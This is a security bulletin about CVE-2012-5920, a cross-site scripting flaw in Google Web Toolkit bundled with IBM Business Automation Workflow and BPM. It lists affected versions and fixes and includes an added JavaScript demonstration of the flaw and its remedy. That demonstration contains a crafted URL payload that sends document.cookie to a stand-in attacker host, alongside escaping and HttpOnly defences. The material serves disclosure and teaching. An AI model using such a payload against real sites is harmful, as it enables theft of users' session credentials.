History: Jan 14, 2021, 9:22 p.m.

Security Bulletin: Cross Site Scripting vulnerability in Google Web Toolkit may affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) - CVE-2012-5920

Published: 2021-01-14 21:22:30
Source: www.ibm.com

EPSS: 0.003 (Low), percentile 65.5%

Summary

IBM Business Process Manager and IBM Business Automation Workflow may be vulnerable to a cross-site scripting attack via the bundled Google Web Toolkit (GWT) component.

Vulnerability Details

CVEID: CVE-2012-5920
DESCRIPTION: Google Web Toolkit is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Note: This vulnerability is due to an incomplete fix for CVE-2012-4563.
CVSS Base score: 4.3
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/80331 for the current score.
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
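The bulletin describes the classic reflected-XSS pattern: a value taken from a crafted URL is written into the page as HTML, so a victim who clicks the link runs attacker script in the site's origin and the script can read document.cookie. The following is an added illustration of that pattern and its fix, written for this page; it is not IBM's or GWT's code, says nothing about where in GWT the flaw lies, and the URL, the `name` parameter and the payload are constructed for the example. It runs under Node.js with no DOM by building the markup as a string, which is exactly what an `innerHTML` assignment would parse.

```javascript
// Added example (not from IBM or GWT). Demonstrates reflected XSS via a crafted
// URL beside a hardened renderer and the cookie hardening that blunts credential theft.

// Attacker-crafted link (constructed). Decodes to:
//   <img src=x onerror="fetch('https://evil.example/?c='+document.cookie)">
const CRAFTED_URL =
  "https://app.example.com/greet?name=%3Cimg%20src%3Dx%20onerror%3D%22fetch('https://evil.example/?c='%2Bdocument.cookie)%22%3E";

// Read a query parameter the way client-side code would from location.href.
function getParam(urlString, key) {
  return new URL(urlString).searchParams.get(key) ?? "";
}

// VULNERABLE: interpolates the raw value into HTML. In a browser this is
// `el.innerHTML = renderUnsafe(name)`; the <img onerror=...> handler fires.
function renderUnsafe(name) {
  return "<p>Hello, " + name + "!</p>";
}

// HARDENED: contextual output encoding for an HTML text node. Every character
// that can change HTML structure is replaced before interpolation. In real code
// prefer textContent or a templating engine that escapes by default.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(name) {
  return "<p>Hello, " + escapeHtml(name) + "!</p>";
}

// Demonstration-only check: does the markup contain a tag carrying an inline
// event handler (on...=)? Not a general XSS detector.
function containsEventHandler(html) {
  return /<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Defence in depth: an HttpOnly session cookie cannot be read via document.cookie,
// so the payload above exfiltrates nothing even if an XSS slips through.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

function demo() {
  const name = getParam(CRAFTED_URL, "name");
  return {
    unsafe: renderUnsafe(name),
    safe: renderSafe(name),
    unsafeExecutes: containsEventHandler(renderUnsafe(name)),
    safeExecutes: containsEventHandler(renderSafe(name)),
    cookie: sessionCookieHeader("JSESSIONID", "example-session-id"),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The escaping fix addresses the sink; the HttpOnly flag addresses the consequence the bulletin names (theft of cookie-based credentials). Both belong in a fix, because an incomplete patch to the sink, which is what this CVE records relative to CVE-2012-4563, leaves the cookie exposed otherwise.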

Affected Products and Versions

Affected Product(s)                  Version(s)
IBM Business Automation Workflow     V20.0.0.1, V19.0, V18.0 (V20.0.0.2 is NOT affected)
IBM Business Process Manager         V8.6, V8.5

For earlier and unsupported versions of the products, IBM recommends upgrading to a fixed, supported version of the product.

Remediation/Fixes

The recommended solution is to apply the Interim Fix (iFix) or Cumulative Fix (CF) containing APAR JR62790 as soon as practical:

For IBM Business Automation Workflow V18.0, V19.0, and V20.0
· Upgrade to the minimal cumulative fix level required by the iFix, then apply iFix JR62790
--OR--
· Apply cumulative fix Business Automation Workflow V20.0.0.2 or later

For IBM Business Process Manager V8.6
· Upgrade to the minimal cumulative fix level required by the iFix, then apply iFix JR62790
--OR--
· Upgrade to Business Automation Workflow V20.0.0.2 or later

For IBM BPM V8.5
· Upgrade to IBM BPM V8.5.7, apply Cumulative Fix 2017.06, then apply iFix JR62790
--OR--
· Upgrade to Business Automation Workflow V20.0.0.2 or later

Workarounds and Mitigations

None
